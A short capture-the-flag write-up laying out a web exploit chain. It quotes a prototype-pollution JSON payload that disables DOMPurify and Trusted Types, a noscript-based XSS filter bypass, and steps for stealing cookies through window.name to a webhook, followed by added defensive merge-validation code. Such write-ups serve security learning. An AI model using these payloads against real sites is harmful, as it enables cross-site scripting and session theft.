I got the inspiration for this challenge while I was playing a challenge by @53c0nd-2473.
- Overwrite the `Object` object's `getOwnPropertyNames` with the "nice feature" to bypass DOMPurify + Trusted Types: `{"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}`
- Bypass the custom filter with the `noscript` tag. Example: `<noscript><img src="</noscript><img src=1 onerror=alert()">`
- Steal cookies using `debug.js` and set the parent's name to the cookies and redirect with a meta tag.
- Send `window.name` to your webhook.
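
For the first step, an added example (not code from the challenge or its author): it assumes the "nice feature" is a recursive merge of parsed JSON into an object whose `name` is a string, and the names `findPollutionPaths`, `resolveTarget`, `mergeOwn` and `safeMerge` are hypothetical. It shows, without writing anything, why the payload's key path ends at the `Object` constructor, and a merge that rejects such input before touching the target.

```javascript
// Added example. Assumption: the "nice feature" is a recursive merge of parsed JSON.
// Constructed sample input: the payload quoted in the write-up.
const PAYLOAD =
  '{"name":{"__proto__":{"__proto__":{"constructor":{"getOwnPropertyNames":"B"}}}}}';
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);
const isPlain = (v) => v !== null && typeof v === "object" && !Array.isArray(v);
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);

// List every key path in parsed JSON that passes through a forbidden key.
function findPollutionPaths(value, path = []) {
  if (value === null || typeof value !== "object") return [];
  const hits = [];
  for (const key of Object.keys(value)) {
    const next = [...path, key];
    if (FORBIDDEN_KEYS.has(key)) hits.push(next.join("."));
    hits.push(...findPollutionPaths(value[key], next));
  }
  return hits;
}

// Read-only walk: the object a merge that follows target[key] would reach.
function resolveTarget(start, keys) {
  let cur = start;
  for (const key of keys) cur = Object(cur)[key];
  return cur;
}

// Merge that recurses only into own plain-object properties of the target.
function mergeOwn(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (isPlain(value)) {
      if (!hasOwn(target, key) || !isPlain(target[key])) target[key] = {};
      mergeOwn(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened entry point: reject the whole input before touching the target.
function safeMerge(target, source) {
  const bad = findPollutionPaths(source);
  if (bad.length > 0) throw new Error("rejected key paths: " + bad.join(", "));
  return mergeOwn(target, source);
}
```

Starting from a string `name`, the path `__proto__.__proto__.constructor` resolves to `String.prototype`, then `Object.prototype`, then `Object` itself, which is why a single assignment at the end of that path replaces `Object.getOwnPropertyNames`.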